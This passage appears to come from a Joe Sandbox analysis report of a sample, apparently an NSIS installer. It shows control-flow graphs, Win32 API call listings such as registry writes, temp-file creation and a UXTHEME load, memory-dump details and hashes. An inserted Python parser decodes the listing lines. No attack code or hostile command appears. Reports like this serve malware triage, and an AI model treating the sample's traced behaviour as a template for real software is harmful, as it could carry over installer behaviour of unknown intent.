                                                           Control-flow Graph
                                                          control_flow_graph 750 406752-406772 GetSystemDirectoryW 751 406774 750->751 752 406776-406778 750->752 751->752 753 406789-40678b 752->753 754 40677a-406783 752->754 756 40678c-4067bf wsprintfW LoadLibraryExW 753->756 754->753 755 406785-406787 754->755 755->756
                                                          APIs
                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                          • wsprintfW.USER32 ref: 004067A4
                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                          • String ID: %s%S.dll$UXTHEME$\
                                                          • API String ID: 2200240437-1946221925
                                                          • Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                          • Instruction ID: 07f60acf873a648e61080255fd3e200204736070213a9ab7c1209ab7057fe03e
                                                          • Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                          • Instruction Fuzzy Hash: 27F0FC70540219AECB10AB68ED0DFAB366CA700304F10447AA64AF20D1EB789A24C798
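The "APIs" listings on this page render each Win32 call in one textual shape (`Function.Module(args), ref: address`, with `Part of subcall function` marking callee activity). The parser below is an added example, not code from Joe Sandbox or from the analysed sample: it turns those bullets into records so a triager can pull out the call order of a function, every Windows path that appears as an argument (the `nsc34E8.tmp` NSIS plugin directory, the `Temp\` prefix handed to GetTempFileNameW) and the dwFlags value of the LoadLibraryExW call in the UXTHEME loader above. The line grammar is an assumption read off the visible lines; the sample input is copied from this page's listings (the GetTempFileNameW line trimmed), and the flag table holds the documented LoadLibraryEx dwFlags bits.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# One bullet of an "APIs" listing as rendered on this page, for example
#   • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8
#   • wsprintfW.USER32 ref: 004067A4
#     • Part of subcall function 004063E8: lstrcpynW.KERNEL32(...), ref: 004063F5
# Assumed grammar, inferred from the visible lines; Joe Sandbox publishes none.
_API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<func>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
_WIN_PATH = re.compile(r"^[A-Za-z]:\\")

# Documented LoadLibraryEx dwFlags bits.
_LOADLIBRARYEX_FLAGS = {
    0x0001: "DONT_RESOLVE_DLL_REFERENCES",
    0x0002: "LOAD_LIBRARY_AS_DATAFILE",
    0x0008: "LOAD_WITH_ALTERED_SEARCH_PATH",
    0x0010: "LOAD_IGNORE_CODE_AUTHZ_LEVEL",
    0x0020: "LOAD_LIBRARY_AS_IMAGE_RESOURCE",
    0x0040: "LOAD_LIBRARY_AS_DATAFILE_EXCLUSIVE",
    0x0100: "LOAD_LIBRARY_SEARCH_DLL_LOAD_DIR",
    0x0200: "LOAD_LIBRARY_SEARCH_APPLICATION_DIR",
    0x0400: "LOAD_LIBRARY_SEARCH_USER_DIRS",
    0x0800: "LOAD_LIBRARY_SEARCH_SYSTEM32",
    0x1000: "LOAD_LIBRARY_SEARCH_DEFAULT_DIRS",
}


@dataclass
class ApiCall:
    func: str
    module: str
    args: List[str]                    # raw tokens; "?" = value not recovered by the analyser
    ref: int                           # address of the call instruction
    subcall_of: Optional[int] = None   # set for "Part of subcall function" lines


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse every matching bullet in `text`; non-matching lines are ignored."""
    calls = []
    for line in text.splitlines():
        m = _API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        sub = m.group("sub")
        calls.append(ApiCall(m.group("func"), m.group("mod"), args,
                             int(m.group("ref"), 16), int(sub, 16) if sub else None))
    return calls


def observed_paths(calls: List[ApiCall]) -> List[str]:
    """Distinct drive-letter paths seen as arguments, sorted."""
    return sorted({a for c in calls for a in c.args if _WIN_PATH.match(a)})


def direct_calls(calls: List[ApiCall]) -> List[str]:
    """Names of the function's own calls in listing order, omitting subcall lines."""
    return [c.func for c in calls if c.subcall_of is None]


def loadlibraryex_flags(call: ApiCall) -> Optional[List[str]]:
    """Decode the dwFlags (third) argument of a LoadLibraryExW record; None if unknown."""
    if call.func != "LoadLibraryExW" or len(call.args) < 3 or call.args[2] == "?":
        return None
    value = int(call.args[2], 16)
    return [name for bit, name in _LOADLIBRARYEX_FLAGS.items() if value & bit]


# Sample input: lines copied from the listings on this page (GetTempFileNameW trimmed).
SAMPLE_LINES = [
    r"• lstrcatW.KERNEL32(00000000,00000000,Call,00436000,?,?,00000031), ref: 004017B0",
    r"• CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,00436000,?,?,00000031), ref: 004017D5",
    r"  • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5",
    r"• GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769",
    r"• wsprintfW.USER32 ref: 004067A4",
    r"• LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8",
    r"• lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsc34E8.tmp,00000023,00000011,00000002), ref: 0040242F",
    r"• GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00435000,004034A3,1033,C:\Users\user\AppData\Local\Temp\,774D3420,004036EF), ref: 00405F46",
]

if __name__ == "__main__":
    calls = parse_api_lines("\n".join(SAMPLE_LINES))
    for c in calls:
        print(f"{c.ref:08X} {c.func}.{c.module} {c.args}")
    print("paths:", observed_paths(calls))
    for c in calls:
        if c.func == "LoadLibraryExW":
            print("LoadLibraryExW dwFlags:", loadlibraryex_flags(c))
```

In the UXTHEME loader above the decoded flag is LOAD_WITH_ALTERED_SEARCH_PATH (0x8), and the path it receives was built by wsprintfW from the GetSystemDirectoryW result, so that DLL is resolved from the system directory rather than from the default search order. A `?` token means Joe Sandbox could not recover the value from the stack at that point, so the parser keeps it as the literal string instead of guessing.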

                                                           Control-flow Graph
                                                          control_flow_graph 757 6eab1777-6eab17b6 call 6eab1b5f 761 6eab17bc-6eab17c0 757->761 762 6eab18d6-6eab18d8 757->762 763 6eab17c9-6eab17d6 call 6eab2394 761->763 764 6eab17c2-6eab17c8 call 6eab2352 761->764 769 6eab17d8-6eab17dd 763->769 770 6eab1806-6eab180d 763->770 764->763 773 6eab17f8-6eab17fb 769->773 774 6eab17df-6eab17e0 769->774 771 6eab180f-6eab182b call 6eab2569 call 6eab15b4 call 6eab1272 GlobalFree 770->771 772 6eab182d-6eab1831 770->772 796 6eab1885-6eab1889 771->796 779 6eab187e-6eab1884 call 6eab2569 772->779 780 6eab1833-6eab187c call 6eab15c6 call 6eab2569 772->780 773->770 775 6eab17fd-6eab17fe call 6eab2d37 773->775 777 6eab17e8-6eab17e9 call 6eab2aac 774->777 778 6eab17e2-6eab17e3 774->778 789 6eab1803 775->789 792 6eab17ee 777->792 784 6eab17f0-6eab17f6 call 6eab2724 778->784 785 6eab17e5-6eab17e6 778->785 779->796 780->796 795 6eab1805 784->795 785->770 785->777 789->795 792->789 795->770 800 6eab188b-6eab1899 call 6eab252c 796->800 801 6eab18c6-6eab18cd 796->801 807 6eab189b-6eab189e 800->807 808 6eab18b1-6eab18b8 800->808 801->762 803 6eab18cf-6eab18d0 GlobalFree 801->803 803->762 807->808 809 6eab18a0-6eab18a8 807->809 808->801 810 6eab18ba-6eab18c5 call 6eab153d 808->810 809->808 811 6eab18aa-6eab18ab FreeLibrary 809->811 810->801 811->808
                                                          APIs
                                                            • Part of subcall function 6EAB1B5F: GlobalFree.KERNEL32(?), ref: 6EAB1DB2
                                                            • Part of subcall function 6EAB1B5F: GlobalFree.KERNEL32(?), ref: 6EAB1DB7
                                                            • Part of subcall function 6EAB1B5F: GlobalFree.KERNEL32(?), ref: 6EAB1DBC
                                                          • GlobalFree.KERNEL32(00000000), ref: 6EAB1825
                                                          • FreeLibrary.KERNEL32(?), ref: 6EAB18AB
                                                          • GlobalFree.KERNEL32(00000000), ref: 6EAB18D0
                                                            • Part of subcall function 6EAB2352: GlobalAlloc.KERNEL32(00000040,?), ref: 6EAB2383
                                                            • Part of subcall function 6EAB2724: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6EAB17F6,00000000), ref: 6EAB27F4
                                                            • Part of subcall function 6EAB15C6: wsprintfW.USER32 ref: 6EAB15F4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1764566843.000000006EAB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6EAB0000, based on PE: true
                                                           • Associated: 00000000.00000002.1764543418.000000006EAB0000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000000.00000002.1764585429.000000006EAB4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000000.00000002.1764610050.000000006EAB6000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6eab0000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$Alloc$Librarywsprintf
                                                          • String ID:
                                                          • API String ID: 3962662361-3916222277
                                                          • Opcode ID: b18107096cb80aa25b99a8bac40d39c77e54ceb00ab1653fcf9417832be8a749
                                                          • Instruction ID: e4770636bf4b95f02aaaa7a37c93a0545b5b2b79677fcfae5818d42c87a07eb6
                                                          • Opcode Fuzzy Hash: b18107096cb80aa25b99a8bac40d39c77e54ceb00ab1653fcf9417832be8a749
                                                          • Instruction Fuzzy Hash: A241D0718003059ADF409FF4D994BE63BACBF16314F1849B5E915AF186DB7888CDCBA8

                                                           Control-flow Graph
                                                          control_flow_graph 814 4023e4-402415 call 402c41 * 2 call 402cd1 821 402ac5-402ad4 814->821 822 40241b-402425 814->822 824 402427-402434 call 402c41 lstrlenW 822->824 825 402438-40243b 822->825 824->825 828 40243d-40244e call 402c1f 825->828 829 40244f-402452 825->829 828->829 832 402463-402477 RegSetValueExW 829->832 833 402454-40245e call 4031d6 829->833 836 402479 832->836 837 40247c-40255d RegCloseKey 832->837 833->832 836->837 837->821 839 40288b-402892 837->839 839->821
                                                          APIs
                                                          • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsc34E8.tmp,00000023,00000011,00000002), ref: 0040242F
                                                          • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsc34E8.tmp,00000000,00000011,00000002), ref: 0040246F
                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsc34E8.tmp,00000000,00000011,00000002), ref: 00402557
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: CloseValuelstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsc34E8.tmp
                                                          • API String ID: 2655323295-2425982580
                                                          • Opcode ID: 73e16f22230fec4bb41596bf14ea3730359cb40e1001d342c6dd81160fbf5f59
                                                          • Instruction ID: 2320c74fc41ffeb716861e397aa06506e2c1d49fdd3331f7b5a779c93e7e4390
                                                          • Opcode Fuzzy Hash: 73e16f22230fec4bb41596bf14ea3730359cb40e1001d342c6dd81160fbf5f59
                                                          • Instruction Fuzzy Hash: C4118471E00104BEEB10AFA5DE89EAEBB74EB44754F11803BF504B71D1DBB89D419B68

                                                           Control-flow Graph
                                                          control_flow_graph 840 405f0d-405f19 841 405f1a-405f4e GetTickCount GetTempFileNameW 840->841 842 405f50-405f52 841->842 843 405f5d-405f5f 841->843 842->841 844 405f54 842->844 845 405f57-405f5a 843->845 844->845
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00405F2B
                                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00435000,004034A3,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,774D3420,004036EF), ref: 00405F46
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: CountFileNameTempTick
                                                          • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                          • API String ID: 1716503409-386316673
                                                          • Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                          • Instruction ID: 076564571966e4dc9ef4834731be4d502634ae0aeddccfca5b4533d1bab5a213
                                                          • Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                          • Instruction Fuzzy Hash: 14F09076601204FFEB009F59ED05E9BB7A8EB95750F10803AEE00F7250E6B49A548B68

                                                           Control-flow Graph
                                                          control_flow_graph 846 402d44-402d6d call 406255 848 402d72-402d74 846->848 849 402d76-402d7c 848->849 850 402dec-402df0 848->850 851 402d98-402dad RegEnumKeyW 849->851 852 402d7e-402d80 851->852 853 402daf-402dc1 RegCloseKey call 4067c2 851->853 854 402dd0-402dde RegCloseKey 852->854 855 402d82-402d96 call 402d44 852->855 860 402de0-402de6 RegDeleteKeyW 853->860 861 402dc3-402dce 853->861 854->850 855->851 855->853 860->850 861->850
                                                          APIs
                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: Close$Enum
                                                          • String ID:
                                                          • API String ID: 464197530-0
                                                          • Opcode ID: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                          • Instruction ID: 3410daaf41eb2a8de7896e1fb7aa518538b3e031ab7f3cb45a1fbd23233d04dd
                                                          • Opcode Fuzzy Hash: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                          • Instruction Fuzzy Hash: CE116A32500108FBDF12AB90CE09FEE7B7DAF44350F100076B905B61E0E7B59E21AB58

                                                           Control-flow Graph
                                                          control_flow_graph 863 40591f-40596a CreateDirectoryW 864 405970-40597d GetLastError 863->864 865 40596c-40596e 863->865 866 405997-405999 864->866 867 40597f-405993 SetFileSecurityW 864->867 865->866 867->865 868 405995 GetLastError 867->868 868->866
                                                          APIs
                                                          • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405962
                                                          • GetLastError.KERNEL32 ref: 00405976
                                                          • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040598B
                                                          • GetLastError.KERNEL32 ref: 00405995
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                          • String ID:
                                                          • API String ID: 3449924974-0
                                                          • Opcode ID: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                          • Instruction ID: ca5323325ecea66cc3de0aafa4d6cbc44a00468c8660a14113972894dcb98988
                                                          • Opcode Fuzzy Hash: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                          • Instruction Fuzzy Hash: 970108B1C10219DADF009FA5C944BEFBFB4EB14314F00403AE544B6290DB789608CFA9
                                                          APIs
                                                          • IsWindowVisible.USER32(?), ref: 004053F3
                                                          • CallWindowProcW.USER32(?,?,?,?), ref: 00405444
                                                            • Part of subcall function 004043AB: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043BD
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: Window$CallMessageProcSendVisible
                                                          • String ID:
                                                          • API String ID: 3748168415-3916222277
                                                          • Opcode ID: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                          • Instruction ID: 343f6187318c33bb175646012d6cb398530476c6c15fe8dd96994d534b9a6b17
                                                          • Opcode Fuzzy Hash: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                          • Instruction Fuzzy Hash: CC0171B1200609ABDF305F11DD84B9B3666EBD4356F508037FA00761E1C77A8DD29A6E
                                                          APIs
                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,00422708,00000000,?,?,Call,?,?,0040652A,80000002), ref: 004062FC
                                                          • RegCloseKey.ADVAPI32(?,?,0040652A,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,00422708), ref: 00406307
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: CloseQueryValue
                                                          • String ID: Call
                                                          • API String ID: 3356406503-1824292864
                                                          • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                          • Instruction ID: efe3e51cb47fe95fa6bbb83f3cb46ebf457b8c4b35673ac5825ceff03b23bf8b
                                                          • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                          • Instruction Fuzzy Hash: B301717250020AEBDF218F55CD09EDB3FA9EF55354F114039FD15A2150E778D964CBA4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                          • Instruction ID: 2bd06e12bed6e0bcd81d630d0cd78bd49004ac77cb8b5ebb757de7108a839e92
                                                          • Opcode Fuzzy Hash: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                          • Instruction Fuzzy Hash: 1DA14471E04228CBDF28CFA8C8446ADBBB1FF44305F14806ED856BB281D7786A86DF45
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                          • Instruction ID: f1da02a2f8b93330a3d469e31e6e9edf047fa596270f1f1d86c95cc791e20b04
                                                          • Opcode Fuzzy Hash: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                          • Instruction Fuzzy Hash: AA910271E04228CBEF28CF98C8447ADBBB1FB45305F14816AD856BB291C778A986DF45
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                          • Instruction ID: fb1d02f26201205f5bfcbd3029eb7cfad7cca69a3f8c46de7b35964bdd0c3f7d
                                                          • Opcode Fuzzy Hash: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                          • Instruction Fuzzy Hash: 18814571E04228DFDF24CFA8C844BADBBB1FB45305F24816AD856BB291C7389986DF45
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
